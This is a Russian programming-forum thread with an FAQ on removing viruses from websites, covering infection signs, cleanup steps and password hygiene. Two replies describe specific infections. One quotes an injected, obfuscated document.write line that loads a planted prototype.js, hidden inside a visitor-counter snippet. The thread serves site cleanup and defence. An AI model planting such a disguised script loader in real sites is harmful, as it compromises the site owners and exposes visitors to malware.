Форум программистов, компьютерный форум, киберфорум
Наши страницы
Безопасность сайтов и серверов
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.58/45: Рейтинг темы: голосов - 45, средняя оценка - 4.58
Taatshi
Администратор
11713 / 5061 / 257
Регистрация: 05.04.2011
Сообщений: 13,811
Записей в блоге: 2
1

FAQ: Как удалить вирус с сайта

10.06.2013, 13:51. Просмотров 8202. Ответов 2

Причины заражения

1. Непроверенные источники для скачивания CMS и расширений под них
2. Неграмотный код
3. Небрежность и игнорирование элементарных правил безопасности
4. Ненадежный, незащищенный хостинг


Признаки заражения

1. Вы ничего не меняли, а сайт вдруг перестал работать как надо: не нажимаются кнопки, не открывается или косо работает админка cms.
2. На сайте появились сторонние включения – левые ссылки, фреймы, всплывающие окна.
3. При переходах по сайту или при переходе из поисковых систем происходит редирект на сторонние сайты, не имеющие к Вашему никакого отношения. Учтите, что редирект может работать только для определенных устройств, например, для мобильных телефонов.
4. При заходе на сайт срабатывает антивирус, установленный на компьютере.
5. Поисковая система или браузер при переходе на сайт предупреждают об опасности заражения.
6. Пришло «Письмо счастья» от Яндекс или Google веб мастера.

Пункты 2, 3, 5, 6 - это не признаки, а точное подтверждение – нужно срочно принимать меры.


Что делать

1. Убедитесь, что Ваш компьютер чист и на нем стоит актуальное антивирусное ПО.
2. Сделайте полный бэкап сайта, скачайте на компьютер.
3. Проверьте даты модификации файлов. Как правило, при вирусном заражении имеет место массовое изменение многих файлов сайта в одно и то же время.
4. Проверьте бэкап антивирусами. Не позволяйте антивирусным программам лечить файлы – многие файлы будут не вылечены, а полностью удалены. Используйте отчеты данного ПО только для обнаружения файлов с вредоносными скриптами.
5. Удалите весь вредоносный код, который указан в отчетах антивирусных программ.
6. Проверьте на вредоносный код все файлы, которые не указаны в отчете антивирусных программ, но были модифицированы в то же время, что и зараженные.
7. Если Вы используете CMS – обновите до последней актуальной версии саму CMS и все установленные расширения.
8. Удалите с хостинга зараженный сайт и разверните чистый после лечения.


Рекомендации

1. Не загружайте дистрибутивы, расширения и коды из непроверенных источников – только с сайтов производителей данного ПО.
2. Удаляйте все установочные дистрибутивы расширений сразу после установки.
3. Следите за обновлениями CMS и расширений и поддерживайте Ваш сайт в актуальном состоянии.
4. Используйте сложные пароли и логины для входа в панель администратора и доступа по FTP и SSH к файловой структуре сайта.
5. Никогда не храните пароли в браузерах и ФТП клиентах, каждый раз вводите их заново.
6. Не используйте одинаковые пароли для доступа в админку, по FTP или SSH, в панель управления хостингом.
7. Раз в два-три месяца меняйте все пароли – не ленитесь этого делать.
8. Устанавливайте правильные права на папки и файлы на хостинге.
9. Если Вы привлекаете для работы с сайтом стороннего специалиста, прежде, чем дать ему доступ к сайту, обязательно сделайте полный бэкап и скачайте его к себе на компьютер. Не давайте ему основных паролей доступа, создавайте временные права доступа. После окончания работ немедленно эти доступы удалите.
10. Не открывайте доступ к сайту всем подряд – этот доступ должен быть только у того, кому он необходим для работы, и именно в том объеме, без которого нельзя обойтись. К примеру, контент-менеджеру ни к чему иметь права суперадминистратора.

Если у кого-то есть предложения, дополнения, пожелания - отписываемся в теме.
5
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
10.06.2013, 13:51
Ответы с готовыми решениями:

Как найти и удалить вирус с сайта?
Как найти и удалить вирус с сайта? Вот собственно сам сайт: Добавлено через...

Как удалить вирус? Вирус в автозагрузке, из-за этого появляется ярлыки в флешке
Также продолжает копировать на флешке Copy of Shortcut to (1,2,3,4).lnk,...

Как удалить вот этот вирус ieunitdrf.inf антивирусники пробывал всякие не могут его удалить
у меня браузер хором ваще не грузит и мозила постоянно вылетает сижу щас с...

Как удалить вирус
Я запустил какую то прогу уже не помню и мне установился какой то вирус который...

Как удалить вирус з ПК?
Хорошего времени суток! Извините, что беспокою вас, но у меня возникла...

2
JohnyV
71 / 75 / 3
Регистрация: 05.11.2012
Сообщений: 471
Записей в блоге: 1
19.09.2013, 17:47 2
Если Ваш сайт инфицирован вредоносной программой типа Downloader.JS.Psyme.ct (название может быть другим)
Вирус действует следующим образом: он устанавливается на ваш локальный компьютер, когда кто-то заходит на инфицированный сайт через браузер со стандартными настройками безопасности. После этого он начинает подбирать логин и пароли на ФТП.Затем происходит проникновение в ваши ФТП аккаунты и в результате код вируса прописывается во все индексные страницы.

Для решение проблемы вам нужно:

1.Удалить код прописаный вирусом во всех индексных страницах
2.Удалить вирус с вашего локального PC
3.Изменить все пароли на ваши ФТП аккаунты

Обратите внимание, что проблема не связана с отсутствием безопасности на сервере, вредоносная программа работает как это описано выше.
1
shestale
Вирусоборец
8589 / 4162 / 329
Регистрация: 22.02.2011
Сообщений: 13,731
24.07.2014, 12:24 3
Заражения сайтов вирусом Troj/JSRedir-MH.
Вирус или троян куда интереснее чем свои предшествиники, теперь в зараженных файлах прописывается не куча подозрительных строк, а вписывается аккуратный код такого вида, например у клиента он был вписан в счетчики подсчета посещения сайта и сразу в глаза не бросился, проверки через онланй системы проверки сайтовов от вирусов не к чему не привели, ругался только яндекс.
Код
<!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' "+ "target=_blank><img src='http://counter.yadro.ru/hit?t54.6;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt='' title='LiveInternet: показано число просмотров и"+ " посетителей за 24 часа' "+ "border='0' width='88' height='31'><\/a>") //--></script><script type="text/javascript"> document.write("<scr"+"ipt src='/administrator/modules/prototype.js' _cke_saved_src='/administrator/modules/prototype.js'><"+"/script>"); </script><!--/LiveInternet--> обратим внимание на эту часть кода <scripttype="text/javascript">
Код
document.write("<scr"+"ipt src='/administrator/modules/prototype.js' _cke_saved_src='/administrator/modules/prototype.js'><"+"/script>"); </script>
Никакого файла prototype.js для работы сайта у нас не было и к системе он не относится, заходим по пути и удаляем его, теперь возвращаемся выше и видим кучу левых созданных файлов с расширением php удаляем их тоже, оставляя только файлы от системы Joomla.
источник
3
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
24.07.2014, 12:24

Как удалить вирус
Помогите пожалуйста удалить вирус, блокирует сеть, не дает работать в...

Как удалить вирус
Столкнулся со следующей проблемой - скачал с просторов интернета архив,...

Как удалить вирус
у меня вирус New Folder, при этом он загружает файл svchost.exe, этот файл...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru